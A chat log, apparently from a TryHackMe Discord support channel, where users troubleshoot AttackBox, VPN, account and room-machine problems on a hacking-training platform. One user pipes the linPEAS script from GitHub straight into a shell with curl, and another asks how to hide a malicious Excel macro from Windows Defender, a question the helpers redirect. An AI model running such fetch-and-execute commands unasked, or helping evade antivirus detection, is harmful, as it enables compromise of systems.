#site-support

Alright, thank you :_)

Gave +1 Rep to @celest wadi

I was try to login to my thm account not happening, I try to forget password but email is not coming

I check spam email too but still no

if you have access to the account E-mail, you'll want to E-mail support from it, they can provide you help if the password reset E-mail doesn't come.

!email

hello

so the thing is ı can open the attack box

and its connected to ınternet for sure

but the thing is

ı cant open a spesific site

Acme IT Support

just started the attack box

and syste openned

where is the target machine

instructions says just wait for 2 min

after opening attack box

content discovery

ok ı did that

the problem is the site for the second challenge doesnt open

the acme ıt support thing

Take a look at the robots.txt file on the Acme IT Support website to see if they have anything they don't want to list - To do this open Firefox on the AttackBox, and enter the url: http://MACHINE_IP/robots.txt (this URL will update 2 minutes from when you start the machine in task 1)

ıt says that first ı have to open that site

ı started it

ı pressed start the machine button

ı tried that too.

😦

no red banner

ı closed everything

now

fırst ı have to click the blue button that says attack box

then the green button ?

nope

ı trıed it all

it says 504 bad gateway

yeah ıt does

the red banner comes

and the clock starts

ım verified and subscribed

how to claim student discount?

Change your email to a student E-mail, if it's not automatically recognised, E-mail support.

not changed.. i did

E-mailed support?

what is emailed support?

may 20 has passed?

Have you E-mailed support?

can anyone tell me how to renew it with a new card

no!

!email

Then give them an E-mail.

I think there was an E-mail related to Student discounts. but Support@tryhackme.com works too.

ok thanks!!

how do i contact supprot my subscription hasnt renewed

!email

Try terminating the machine and then starting again.

you have to wait for the url to show an ip in it

Surely not longer than 25 min(s)?

lab_web_url gets replaced with the machine ip

a refresh would do it then

how long do ı have to wait

cause its been nearly 45 min

try refreshing

Try this
http://10.10.31.152/robots.txt

Yeah, on the task just press CTRL and F5

I think if it's the P lab one.replace the Lab_web_url part with 10-10-31-152

https://lab_web_url.p.thmlabs.com/

yeah its the p lab ı guess

https://10.10.31.152.p.thmlabs.com/

right?

No, in the IP replace the . with -

ok.

Or that worked

They are, I was looking for the lab one.

from the last challenge

so what is the acme ıt support in there that says open that first ?

it was a site from the last challenge

ok

thank you for your help

if you guys ever come to istanbul you get a free coffee for your help from me

thank you again 🙂

General question: This text is next to the IP on my vm, what is it called?

IPV6 i think

Both represents your IP address
The former one in IPv4 format and later in IPv6 format

They're different addresses

They just both belong to you

It's not one address represented two different ways

Yeah
But both are ips representing the host

Ofc they gonna be different cause of formats 👀

I think my words should have been wiser

Thank you guys.

Gave +1 Rep to @finite aurora

Hi , do someone have 5 minutes to help me on a Technical issue on BOF OSCP prep exercices ?

Hey folks. I am on task 13 of https://tryhackme.com/room/burpsuitebasics

Take a look around the site on http://MACHINE_IP/ -- we will be using this a lot throughout the module. Visit every page linked to from the homepage, then check your sitemap -- one endpoint should stand out as being very unusual!

I am using the browser based machine and best I can tell, this server isnt accessible.

It looks like i maybe cant post an image. The error is:

Error response
Error code: 405
Message: Method Not Allowed.
Error code explanation: 405 - Specified method is invalid for this resource.

I attempted the machine IP and http://localhost

Are there any problems with connecting to machines?

Cannot connect from AttackBox and local Kali VM 😦

I can ping the machine, but no SSH connection.

Could do it yesterday 😦

As for example Linux PrivEsc

and suddenly it works now after 1 hour 😦 nvm, now it seems to work

─$ ssh user@10.10.33.126     
Unable to negotiate with 10.10.33.126 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

Seems that issue is only from the Kali VM I have. Any ideas?

Perfect, thanks for the pushup, I learned something new today. But.. why 😦 ? Never had this before with THM.

Gave +1 Rep to @gray loom

https://tenor.com/view/thank-you-thanks-thank-you-so-much-keanu-reeves-gif-21952233

I finish a Room but the room not update with finished, helpme!

Can't seem to figure this one out.

Tried smbclient //10.10.141.251/secret -u Anonymous -p* but something is wrong

Room related question would fit better in #room-help or #room-hints .
Also always providing the room and the task you are on, helps a lot 🙂
Either way, that's not the share name you found during enum stage

how can i submit a suggestion / fix of a room ?

#room-bugs for typos and other problems with rooms that can be fixed

thx

Gave +1 Rep to @plush bay

Hello, I have an issue in the Question 2 and Task 14 from NMAP room, when I try nmap -p1-999 -sX [MACHINE_IP] it tells me that the host seems down, I don't know what to do (I'm connected to the VPN of thm), any idea ?

can you check if you're connected with curl 10.10.10.10/whoami , it should show your ip

curl doesn't work : zsh: Input/Output error: curl

that tells us you probably need to install curl

Mh, I would say that is beyond just curl not being installed

What the heck, I can't do anything

I got always the same error "zsh: Input/Output error: apt"

okay then guess something is broken bad

can you restart the machine and check again?

Yeah that's what i'm going to do

Ty for that, I didn't specify but i'm on Live USB, maybe it comes from that ?

agh

Okay so it was just broken, idk why but now it works and the curl too, so it showed my IP, what I have to do now ?

Yep I answered no

Yep but if it doesn't work, I can't answer to question 2 ?

oh yeah I tried with -Pn but it tells me that 900 scanned ports are in ignored states

Oh my bad I just tried 900 instead of 999, ty for your help !

hello, I have a problem to verify because my thm account is already linked to a discord account that I have no longer access

pls help me

how do you not have access to the Discord account any more?

because i lost my phone with the 2fa

:c

in Walking An Application, the link that we are supposed to access is not working... error is the connection has timed out

...that really doesn't help me help you. I literally meant how do you not have access? Don't know the password? Forgot the email? Used a throwaway account? Got banned from this server on the account that you linked and are now trying to recover it? What is the account name? Not the nickname you used for the server, but the account name? Support is gonna need to know that.

I lost my phone where I had the two factor autentication of the discord account

thats why i don´t have acces

then you would need to contact discord support to have them help you with removing two factor authentication from your account. as far as the token is concerned, you would need to email support@tryhackme.com

alternatively, you could just get your service provider to issue you a new sim card and port the number over and pop it into a new phone.

if you have a phone with a vSIM, then just activate a new phone.

if you cant afford a new phone, use an old one.

if you dont have an old one..... talk with support cuz thats a tough spot.

the problem is the google authenticator app don't let me recoverthe 2fa keys even if i have recover my old number

and lemme guess... you didnt follow the instructions and keep a copy of your backup codes handy?

exactly

hi guys i have a problem with the Blaster room
i can't find the history in the explorer browser
they are only today history

Does anyone know how to make it so the windows 10 defender doesn't detect a malicious excel macro ?

This is more for THM related questions, you might get an answer in #infosec-general if it's not black hat stuff.

Okay thank you

hello, i have a problem downloading the configuration file for the OpenVPN. I enrolled in the OpenVPN room and went to the "access" link, where I saw a green button "download my configuration file" but when I click on it I'm being redirected to a 404 page (https://tryhackme.com/404) - how can i solve this problem?

#site-support message

thanks! sorry I've missed it 😅

How would I go about installing linPEAS on Kali?

I cloned the github repository and I see three files "builder", "images", and "readme".

I don't see the linpeas.sh file anywhere.

I managed to start it up using this command:

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Oh, I see.

Does that command just save me the trouble of installing it on my machine?

Oh, I'm so sorry I forgot to add I'm using Kali WSL2.

If I don't want to use the curl command to execute linPEAS and I just want to run it the old fashion way, how would I go about doing that?

The github pages aren't helping much.

Basically, not having to run the curl command.

I just want access to the linpeas.sh file.

Because for some reason, after cloning the repository, there's like three directories "builder", "images and a file called "read me".

Out of curiosity, after using curl to save the .sh file, where would it go?

As in, where would it be saved?

Whatever directory I've chosen?

Using cd?

Honestly, I'm trying to close the gap as fast as I can.

Definitely going to join a few Linux rooms after this one.

You have to walk before you run.

Would the Linux rooms provide me with an in-depth understanding of Linux? I've been looking for a decent Linux course for a while now.

All of the fundamental skills you pick up along the way may seem trivial, but they are crucial to understanding how everything works together later

there are a number of rooms that all build on top of one another. Best choice would be to go to the Learn section and start doing the Learning Paths. This will give you a start to finish experience with some of the core concepts.

Also, simply immersing yourself in Linux is another good way. Load Ubuntu onto a system and start poking at it, see what you can do and what you can break. Google is your best friend

if you render it fubar, just erase it and start again. VMs are gold when it comes to this. Spin them up, delete them and do it again

I have to say, though, even with my limited knowledge of Linux, after using Kali for a few hours today, I think I've learned quite a bit.

I have been poking around with Debian and Arch based distros.

Pop_OS and EndeavorOS, specifically.

Though, it would seem I haven't been poking around as much as I thought I was.

yeah, no offense and not to be rude, but as lassi mentioned earlier, operations like curl and piping are pretty low level. if you dont have a decent handle on how to navigate around linux, then you might want to start there.

being able to find your way around comfortably is crucial

Guess I'll start with the Linux rooms then.

when connecting through ssh

what's the password?

Hello guys, I am working on a MISP room and when I press the completed button it does not check the questions as completed and just resets the room if I refresh the page. I tried pressing completed button on different rooms and it is working.

And now I tried starting the machine and it got stuck on 00 and after I refreshed, the progress tracking was gone and I cant see the Indication of the machine being started or a button to stop it. However if I press start machine it tells me the machine is started.

Have you refreshed the page with ctrl + F5 already? So not just a normal refresh ?

yep and now since I left the room in hopes that might do something now I cant rejoin

its only happening on this one room

if I press join room button it just refreshes

Hi all, hope you're all well

I'm experiencing some difficulty with connecting to an attack target IP in the User ID Enumeration room

I have a machine running, but unable to ping or visit in the browser

https://tryhackme.com/room/authenticationbypass

Mh, not sure what's going on, if you are talking about that room: https://tryhackme.com/room/misp everything works just fine for me

Did you do smth? It just started working

No, I just joined the room, probably that's the magic I did 😄

anyway thanks I guess

Gave +1 Rep to @crystal marlin

Not sure if this is the right channel, but I think the "Brute Force" section in the Authentication Bypass part of Introduction to Web Hacking, may have some errors. I've checked my syntax over and over, and it's not giving the expected results... I should get back one entry that is not a 200 response code, according to the lab, but I'm not getting any entries. I have no returned errors, and I am getting 200 responses, so the ffuf command is working as it should, just not getting what I need back to complete the lab.'

#room-hints please
This channel is for tech support directly related to the tryhackme site or VPN

hi, via the attack box, and a kali VM

10.10.236.163/customers/signup

its working now

no, it is attackbox

tech support

my machine is running but I am not able to visit the ip of my ,machine from browser

Are you using the attackbox or your own VM?

http://machine_ip/

I am using my own

What is the machine ip?

Also are you connected to the VPN?

10.10.8.6, no not in vpn

You need to be connected to the VPN to enable access to all THM machines.

aah, cool

thanks bro

https://tryhackme.com/access

If you're unsure

!vpn

Which room are you doing?

guys if i use the openVPN does it let me use attackbox for more than 1 hour a day and more than once (im a free user)

No.

The VPN is if you have a virtual machine on your host system.

damn i downloaded a whole vpn for nothing

😭

Also no.

Do you have a vm?

whats vm

nope

It's a virtual machine you can have, easiest way to put it would be like.. You can emulate another OS in your system.

yeah nah i dont

I'd suggest using one 🙂

The attackbox is handy, but I prefer my own VM as I can make changed and add tools etc to the VM.

The attackbox doesn't store anything, once you terminate the attackbox, it reverts back to the state it was booted up in.

https://www.youtube.com/watch?v=mQP0wqNT_DI

Here is a quick 15 min video of VM's

In the "Living Off the Land" room i have this problem when i try to connect in RDP:

so I connected to VPN still issue persists

Which room are you doing?

https://tryhackme.com/room/burpsuitebasics#

here task 13 I am trying

I have kali running on virtualbox inside that I have openVPn installed with profile running shared on trayhackme to access my machine

Just to confirm, you clicked there?

just a silly doubt attack machine and VM provided to me are different? like attack machine are specifically designed for particular rooms ?

Attackbox is an Ubuntu based Virtual Machine.

The "start machine" starts VM's that you attack.

cool, what is my machine for ?

Doing the attacking.

When you click start machine, you'll get that box.

The IP I have circled will become visible any interaction you do ( with the exception of reverse shells etc) you do it with that IP.

It will always be 10.10.xxx.xxx

after it changed it will be like that

and it will change accordingly within each task.

this site, from where should I access it ? cause this will be my attack box so inside attackbox browser I need to access this site ?

If you're running a VM with the Openvpn running, use it there (close your attackbox)

Access it from a web browser

Or use the browser within burp

got it

it worked thanks

😄 excellent.

Hello good people of respect🙋🏾

im new here...i would love to know a few things about hacking..

@hidden saddle The site has almost everything you need to get started. The raw materials are there, you just gotta put in the long hours and the work to learn it and understand it.

Start doing rooms, try some challenges, set up your own home lab

Thanks for response Lycan🫶🏽

Gave +1 Rep to @sleek jackal

How do i do this?

You sign up for the site. Just create an account. There are free rooms and subscription rooms. Plenty of free rooms to get you started

As far as a home lab is concerned, that take research and hands on work to do. If you have an old computer lying around, throw DVL on it and try poking it to see what happens

I prefer using my own too. Much faster and persistent storage.

Link for DVL pls

https://en.m.wikipedia.org/wiki/Damn_Vulnerable_Linux

That should get you started

Read up on it before you just throw it on a machine.

Can i still get the .iso even though its discountinued

Hello I am having an issue with an answer that appears 100% correct not working.

Which room?

Metasploit: Exploitation

Which Task is wrong for you?

And can you link the room?

whyy cannot post pic heree

huhuhu

Hello I am having an issue with an answer that appears 100% correct not working.

this is problem

Ok, if you verify, We can help you better.

but why not today

I was talking and typing.

how to get verified

!docs verify

don't talk and type smh

https://tryhackme.com/room/metasploitexploitation#

Follow those steps, ensuring your DM's are open to server people

It is the NLTM hash

What hash do you have?

where is token

In your profile

!docs verify

It's all in there I mean

why

Take out the ||testing||

done it

Your answers are correct, you just have added information.

If you look at the number of * that will give you a hint on the answer.

can users not post screenshots here?

Or am I just dumb

You need to be verified.

ah

!docs verify

they can if they are verified

Follow those steps and you'll be verified in no time, (ensuring your DM's are open to server members)

there we go

Yeah

It's just half of it.

oh

hmmm

im dumb

The second half is normally the password hash.

haha

You have White-box testing, the answer is just ||white box||

I didn't see the :

stupid flesh eyes

yes tq

Happy hacking!

Happy hacking!

what is attack box

a virtual machine with a lot of tools and stuff preinstalled that you can launch in your browser when using tryhackme..... you get 1 hour of useage of it a day unless you are a subscriber....

why only one hour

because spinning it up and using it requires hardware and other server stuff that cost money.... hence limited to one hour for free users

and most of the time you can finish a room in one hour anyways

free user can have it?

yeah

where is attack box dear

at the top of the page when you are in a room there is this button that lets you start it......

cannot find mine

there might also be another button that says show split view that lets you see your current attackbox instance

after get connected to openvpn

then how i can do virtual machine

https://help.tryhackme.com/tryhackme-attack-machine

then use for for openvpn

what for

okay

Hey does anyone has a solution to make Splunk work in the Incident handling with Splunk Room???

getting a " This browser is not supported by Splunk.
Please refer to the list of Supported Browsers." message everytime

Im on intro to digital forensics, on task 3 and cant seem to get the PDF info to answer who the author is. I keep using pdfinfo but what comes up doesn't match the terminal example. Not sure what I am doing wrong but I cant figure it out, please help!!!

#room-hints would be a better place to ask
This channel is for site and VPN related tech support

🤔

Please contact support for this, it won't be handled on discord

!email

Hello, I am facing a problem with Password Security room. I have completed it (a very interesting room btw), but it shows up in my Incompleted rooms and when I try to access it I get an error message Problem finding room.. and If this is an error on our behalf. Please contact us.

Can anyone help me with this?

yeh, that room was deleted afaik, but it still shows up on "my rooms" page 🤷‍♂️

Hi, i have a problem with "Living Off the Land" room to access to the windows machine.
Link to the room: https://tryhackme.com/room/livingofftheland

Hello. May I ask the support why I lost '7 days streak freeze' after missing only 4 days in progress?

My Linux (Parrot) been unable to connect to the internet since yesterday. My windows internet working but my Linux ain’t working. Any help?

This is more tech support for THM, you could try #infosec-general for help @candid warren

Thank you bro.

Gave +1 Rep to @weary spindle

Its a Ubuntu 20.04 x64 setup .. I don't see any other prerequisites?

I am trying to upload a VM to create a new room. Anyone having some experience with this?

I can share my vagrant and setup file if its needed

Server or Desktop?

should be server I guess, i used ubuntu/focal64 image from Vagrant

I'm not familiar, does it come with a GUI/ User interface or is it purely terminal?

Terminal

cc @zealous yoke Are we able to get the logs on why this won't convert?

Tried with vmdk file too. same error!

Any staff maybe knows to get error logs or something.. Any info why is it failing?

Hello 🙂 Is itat all possible to reset a path's progress so all rooms are pristine? If so, how?

Hi there. I had an old discord account that i used my discord token on, but i deleted that account. i attempted to verify on this discord but it says it says the token has been used. is there anyway i can switch my thm discord account?

You need a mod to do it.

do i dm a mod or how do i go about doing that properly?

Eh, just a ping is enough,

@torn citrus @placid mango May i get a mod to help me with my discord token pls?

hey everyone

It it only for me the site is very laggy?

is there anyone experienceing problems with vms?

I mean attackboxes

it is

I just got an error 504 gateway timeout

same

same here

Same here, my entire group (all premium accounts) of students can't reach or load the Kali machines.

yeah only getting a "Secure connection failed"

Robert asked to post #site-bugs

is the site down?

What's your old Discord and TryHackMe account name?

the old account name is L3pyrd (my name on here is a server profile name) and i forget the 4 digits. tryhackme acct is l3pyrd

I'm getting an error saying VNC took too long to load - I cannot get an AttackBox to launch at all

Now it just says Failed to Connect to Server.

Hopefully this is temporary or otherwise this site is pretty useless.

it will be temporary im sure. tryhackme is pretty amazing... when its working lol

Could someone please check the room "Hacking with PowerShell". Machine attach to it is not staring. I tried couples of time

There are site issues atm, We're working on it 🙂

Lol. Ok. Thanks for the reply! I just got started and subscribed and was wondering what in the world I was doing wrong...

Gave +1 Rep to @runic bough

You're not doing anything wrong 😄

hmu if you need any assistance as a beginner! id say im intermediate. i need people to practice with anyway lol

Ok great! Thanks for the offer!

👍

Fix should now be live, may take a while to roll out for some people

Is there any way i could change my username?

Any staff up?

!email

Support will sort you out.

#site-support message

hey
this is keep on happening to me randomly i am using the attackbox
is there anyway to fix this

This is of what issue, can give more details

good question
i am running the AttackBox as usual and suddenly that happens

i tried closing the window and opening from the split view and still didnt work ,the only way is to terminate the machine

if there's tech staff that can give me insight

Hi, what is the filename of the .OVA that you upload? It needs to have no spaces i.e. MyVM.ova

@eager fulcrum @stray cove @fallen juniper may i have a mod's help with authenticating my token? its stuck on my old discord account and i cant verify - the old account has been deleted

Is anyone there
Interesting question
How to brute force Vhost to get key of challenge pentesterlab recon 11

@jade nacelle This channel is for directly tryhackme related tech support like site and VPN issues

It had spaces🥲

It worked without space

could i get some help when you get a chance? its about my discord token

Hello. May I ask the support why I lost '7 days streak freeze' after missing only 4 days in progress?

you might want to email for official help,

!email

Tnx!

i sent an invite to my friends email; where did the room go?

Which room?

it was an invite on the dashboard

hola, is it possible to reset my progress on a path? if so, will i lose my level?

Evening all. Is there a way to contact Tryhackme by mail. Maybe I'm missing a contact us tab?

Had to change my card on file for payment. Ran into issue not being charged.

You can not reset the whole path itself, but each room in the path individually.
And no, you are not losing any level/points by resetting a room.

!email

Hello. I'm trying to do Upload Vulnerabilities room. I keep getting timed out from all of the diffrent adresses (like jewel.uploadvulns.thm) I have terminated and reloaded the room, several time. Cleared cookies. checked /etc/hosts, firewalls. But the problem persists. I have maybe 2 minuts before the room times out, for 8min. I connect trought openvpn and use my own Kali. Anyone ells having these problems?
It might be a vpn issue ...

can you share the machine ip if you have it running?

I just terminated it, changed vpn and rebooted, gona try once more. I'll let you know in a few minuts, if the problem persists

!vpnscript

seems to be working now. thanks anyways

Hello ! Does hydra support ssh key usage ? I'm trying to connect via ssh to a server using an openssh private key but I'm asked to fill a password using ssh -i path_to_key user@host. Hydra doesn't seem to specify the possibility to use a key or I may have used the key wrongly

#subs-room-help message

What is it ?

It's a message I posted, but it's in sub chat, hang on

Hydra has the ability to brute-force the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Didn't see the sub chat, thanks ! I'll look further

Are you a sub?

If so, you'll get access to it if you verify.

why does the free version of attackbox not let me copy-paste stuff

it does... follow this gif for how to copy and paste to and from the attack box

https://media.discordapp.net/attachments/692456966802374687/921063860318924800/clipboard.gif

okay thank you!

Hi there. doing the Walking An Application (or trying to) but the machine doesn't have connectivity.

free users don't have internet on their attackboxes.

I mean, I can't access the: https://10-10-82-100.p.thmlabs.com

Use your own browser

ok, so that behavior is normal right? just wanted to confirm it.

Yup:)

That isn't on the same servers as our VPN, it's on a public server which requires internet access

thanks. for the clarification 🙂

Gave +1 Rep to @bronze vale

hey when I type in the web based kali Linux terminal it it is not getting typed prperly

Okay

Help me every program I click redirects to the recycling bin

Is this a virus

Hi. I need help to recover my account

I created an email and changed the email. After that, my OS crashed and now I don't remember the email

I installed the OS again but now I am in trouble please help me regards this

The account is still linked with my discord

@bronze vale

!email

Ok

Does this portal have technical support at all? I sent an email and there is no confirmation or notification that it has been received and they are engaged in it, as they do in more serious companies.

The support team is small, the support team are better than some "serious" companies.

Everytime I have E-mailed I got an auto-reply advising me I will get an answer in 2-3 days, but it's usually faster than that.

Rule of thumb is if you have E-mailed and haven't had a reply after 7 days, send a follow up.

Okay, I got it. Apparently support needs support)))

It is a discord chat reserved to subs ? I don't really get ^^'

Oh it's a room, okay

It's a channel.

hey, not sure if it related to here
but i am on Enumerating NFS Task on Network Services 2
and when i change to the NFS mount if freeze the terminal and then i can't use it . i am using OpenVPN

i tried to ssh to the server as the task says

i happens when i try to cd to the folder and ls it

and i don't see the job i created for the openVPN but i do have interface listed

?

first thing i did

reboot and terminate the machine

!email

Can you send a screenshot of your OpenVPN output log, please?

i did reboot
i will try it again and the n

just to have real results as the issue happens

I am so sorry, I got sidetracked working

Can you send me a screenshot of it freezing please?

Evening all:)

I have answered all emails from before (and including) the 27th
If you have emailed before then and not received a response yet, I am really sorry!

Please email again and I will respond as soon as possible.

The only exceptions to this are:
- Vulnerability reports

- Job applications

Hey 🙂

!vpnscript

That'll do some troubleshooting for you, especially detecting multiple vpn connections at the same time

Thanks very much I'll have a look through! It seems to be this particular box

thats a great script. Thanks @eager fulcrum and @barren birch !

Gave +1 Rep to @eager fulcrum

Doing the Authentication Bypass room and the link for the machine is not pulling up an active site. I've already reset by browser and tried in the AttackBox Firefox window as well. Is there something I need to do to reset something on my end?

http://10.10.231.185/customers/reset

Yeah its the one that gets linked in the different task list

Did it not like the /customers/reset? I just tried on AttackBox and it works, still not on normal browers. Thanks for your help

Gave +1 Rep to @gray loom

During the Content Discovery Lab I was using my web browser, not the Attack Box for the page source lesson

Don't recall, will definitely keep an eye out for it going through other rooms

hi .. im new to tryhackme .. n i was wondering y the labs r sooo slow ? im trying to use openvpn but like how does it work ? i have already setup the tunnel using my vmware kalibox .. but how like i can't do any nmap scan for the ip address given for the specific tasks

Hey! Do Tryhackme vouchers have any expiration date?

@bronze vale hey. sorry for the ping
i am still stuck
i doubt that this is a VPN issue
looks more like room related
how should i proceed?

What room?

Network Services 2

Oh, the mount freezing?

yup

some times i can read the folder

somtimes the whole tmp freeze

not sure what to do

i think i will skip that room or atleast the vm

and i did run the VPN script and all is good

Were you using the attackbox or own VM?

VM

openVPN

i will try the atackbox

Ah, I don't remember it freezing for me when I used my own VM.

it just not solution if i have to use it every time

i used the openvpn not attack box *

now i will try attack box to see if it any better

I know, I seen it there, it's because I was typing and reading, lol

😂 happens to me all the time lol

The joys of touch typing and not looking down 😄

I do the same when I'm talking.

it's working smoothly with the Attackbox

https://tenor.com/view/dog-dogs-doggy-angry-thinking-gif-18088194

" Uh-oh! Non-subscribed user can only deploy the free AttackBox for 1 hour a day. Subscribe for unlimited access. " ... But i haven't used it for an hour...

When you deploy it, it’s allocated to you for the hour, so you technically use “the hour”, even if you terminate it before the hour is up

It’s not like a “you can use it for an hour across the day” if that makes sense?

Understood, thank you!

I'm not able to access acmeitsupport.thm site using it's ip address

Anyone please guide

Ip address/customers/signup

Hello i need help to change my username because it contains my real name... I have had an issue in the past with the wrong name displayed on the certifications so i had to delete my account and recreate this one. I need to change my username please it's quite urgent for the reasons stated above. Thanks in advance

Your have to add <IP address> domainname.thm in your hosts file, maybe it will work

Uhh okay let me try

Host files of attack box?

yes

I already did, but as last time i didn't had any answers I wanted to try here 🙂

I meant last time when I had issues with certifications, but okay i'll wait thanks

Gave +1 Rep to @gray loom

I'm having an issue with establishing a meterpreter session. I've even watched a walkthrough for it (the guy used the same process). But Msf says "invalid session" every time. Here's the info for the target and my payload. I can't see what the problem is, and when it worked just fine yesterday...

This is in the "HackPark" room:

i think that was it.

just lhost and lport

Ohhh my. I think I know what it is, then... Shit

I didn't set the proper payload in msfconsole

Thank you for pointing that out to me

*headdesk

hi, just wanna ask if we can tar something in windows and then untar it in linux?

Pretty sure, yeah. I think the format is universal

so here is the thing:

• i tar a file in windows (vm) with this command: tar cfv archivo.tar sam
• i sent it via netcat to another vm (kali)
• and when i tried to untar it in kali with this command: (tar xvf archivo.tar)
• it tells me that this does not look like a tar archive

Forgot about S.S. metadata... You've discovered my name 😆

And yeah, that's odd... I'm not very knowledgeable on the subject. Hopefully someone can help you...

Sorry for the false response. I just assumed

This isn't THM related, please ask the question in #infosec-general .

Good evening, I am trying on my room (IDOR) to start the 7th task machine, but it tells me 'You can only deploy a maximum of 3 machines at a time.'. How can I see from where my apparently three machines started so I can terminate them please? Thank you very much. I hope I'm on the right channel 🙂

https://tryhackme.com/api/vm/running lists the running machines

Thank you very much!

Gave +1 Rep to @celest wadi

or you can also just use this to terminate all running machines
#site-support message

I have another question 😊 How can I use RFI in File Inclusion without a webserver to get my code from? Thank you in advance 🙂 (Do I need to have an HTTP Server on my machine which could be visible from the target machine?)

Thank you! 😄

and if you are doing that on tryhackme python3:s http.server module is nice for that purpose

Please ask this question in #room-hints or #room-help if it's for a specific room; otherwise, this isn't really a question for #site-support .

hello

how do i connect in this room

and what is the diffrence

ty for your help😃

I am having connection issues. It doesnt mater which server I get the x through connected

I can't download my Wreath vpn config, I keep getting a 404 even after regenerating

have you hit the regen button waited 5 mins and tried again???

Didn't wait 5min, more like 2 or 3

yeah maybe

Should I do it again and wait 5 minutes ..for some reason I also dont seem to be able t drop screenshots in

I just regenerated again and this time it gave me the green notification so I will wait 5 and see how I go

!docs verify

@sudden elm ⬆️ if you follow this guide you can post screenshots

Sorted

nice another guru user

well that access page is not always accurate with you being connected... for example you could check curl 10.10.10.10/whoami instead to see your ip

Well over 5 minutes now 🙂 still 404

welp not much shadow can do then ¯_(ツ)_/¯

as that is the network vpn file

Alright, thanks anyway ^^

as those don't have alternative servers to choose from

for antman if they are going for just the regular vpn you can try another vpn server and it might work without 404

It seems to have sorted itself out now

nice

thanks for your help

no problem

https://tryhackme.com/api/vm/running fixed my issue. I just needed to know which machines to close.

Hello i cant seem to DM the bot

are your dm:s open to server members or have you limited it in discord settings???

Fixed

thanks

Hey support, I'm trying to download the openvpn config for Wreath but getting a 404 error. Any idea what's up?

Any chance THM will do some giveaways soon?

Try leaving the room for 15 minutes.

bruh
what is the damn use for the
~/.profile
file ?
like i tried putting
export hi='hello';

but apparently this literally never works
why is it so ??? what is the use for this file then ?
can anyone suggest something ?

i need to know this and im hella confused

i wanna put something in a file that will get executed everytime I as a user -> login

try editing ~/.zshrc

if you use bash shell then edit ~/.bashrc

just read this https://linuxhint.com/set-environment-variable-zsh/

you can use command "printenv" to see your environment variables

I got problem with OpenVPN connectivity and i'm trying every step provided as a manual.
My problem was started for the last three days.
Is there actually a problem with the eu servers or is it something else. Please Help me.

!vpnscript

run that and see if you get any errors

[-] You are not connected to the internet
[-] Exiting

But i'm connected ..

Can you ping 8.8.8.8 that's googles server

100% packet loss

Are you on a vm? that might not connected to the internet

i'm on the vm

Yeh, you'll have to connect to the Internet from the vm

Look up "VM Internet connection"

There should be a lot of fixes

i'm connected wired connection. Is it a problem with the settings ?

Yeh, it likely is

I cant ping but i can browsing lol whyyyyy?😆

Got it. Since i was using zsh, i made a .zprofile file and added variables there. It works. Thank you!

Gave +1 Rep to @lament sedge

Which hypervisor are you using?

Is the site down at the moment? Trying to go thru the Command Injection path but the "start machine" function fails

Task 5?

https://tryhackme.com/room/oscommandinjection

Of this room?

Yes Task 5

Works for me.

If you verify, you can provide a screenshot of your screen

!docs verify

Or you can DM it to me.

Ok thanks!

Ah. Disregard. I was being an idiot. Needed to launch the attack box first and go in from Firefox on that. Sorry for the trouble, but thanks for the help!

That room boots up a site that is available on the internet.

If you're a free user the attack box is yours to use for this hour.

Ok. Weird. I could only get it to load thru the attack machine. I'm a subscriber

(a new one)

Ah, sorry.

You're not verified so I just assumed you weren't a sub. 🙂

Subs can load up attackboxes.

👍

I cannot run gobuster -u

gobuster dir -u

and you need a wordlist too

you didn't supply a wordlist after -dir -u

gobuster dir -u http://fakebank.com -w (Insert path to wordlist)

But “dir” not mentioned in instructions

its mentioned in available commands first.

I understand where you are coming from, it would be helpful to have an example.

This is command, but possible need to dig more

looks like it uses dir by default. Not sure mate.

Okie

Where i can fine wordlist?

have you got it to work?

Find

Yup 👍🏻

/usr/share/wordlists/dirbuster

ok good, keep going and good luck!

I cannot see wordlist 😰

Never mind i try later

are you on the kali machine or attack box

if you're on the attackbox you can click on Places>Wordlists at the top of the screen.

cc @tawdry orbit wrong syntax still

You're not meant to do this in the attackbox, there's a specially provided thing to use

Yes using attack machine

Ahh is it, how to find

I haven't done the room

I just know that the content within the room is wrong, and it teaches you a gobuster syntax that is massively outdated

I used Ferroxbuster for that room IIRC

is there a way to disable the "competitive" element in the CTF games?

do you mean koth or ctf rooms, either way there's no feature to adjust the "diificulty" other than just doing easier rooms

I hope you weren't fuzzing fakebank.com

The CTF rooms and im not interested in changing the difficulty just turning of the competitive element

what competitive element? other than bloods for recently released ctf rooms there's nothing else 🤷‍♂️

the large chart at the top comparing you too others

oh that, yeh afaik there's no way of turning that off

some rooms have it disabled by default tho

okay i will try to train my autistic brain to ignore that then

so, a follow-up on this, if you intercept the request in burp and keep forwarding until you see GET /api/scoreboard delete that requests content and forward it, it doesn't show the chart

now you tell me if that's worth doing every time 🤷‍♂️

Yes you can, change it to a "simple room" in the room settings if you're the owner

You can't remove it yourself if you're not the creator
If you have ublock origin etc, you can block the element

Thanks

No, there was a task where you needed to find a dir

Not a dir, another page

I have a gift subscription that I redeemed what if I don't use it will it still expire?

If you have redeemed it against your THM account, yes.

That means it will ezpire in a month right?

Yes.

If it's a months sub.

Ohh I see

Thanks

I am having a problem while connecting to open vpn in the virtualbox while using kali 2022.2
anybody here to help?

Sure, what's up?

Can i Dm you

No, the open chat is fine.

If you need to provide screeshots you could verify.

!docs verify

Anyone been having issues with response times on ctf boxes? trying to attempt Relevant today, but it's coming back as unresponsive, no ping, not loading the webserver, nothing. I've moved VPN servers a couple times, regenerated my vpn profile and added/updated my hosts file with the new IP as I've terminated and started it again. But this has been happening to a few boxes recently, very hit & miss

I had to reset that box two-four times. I only had that issue with Relevant.

Issue Resolved

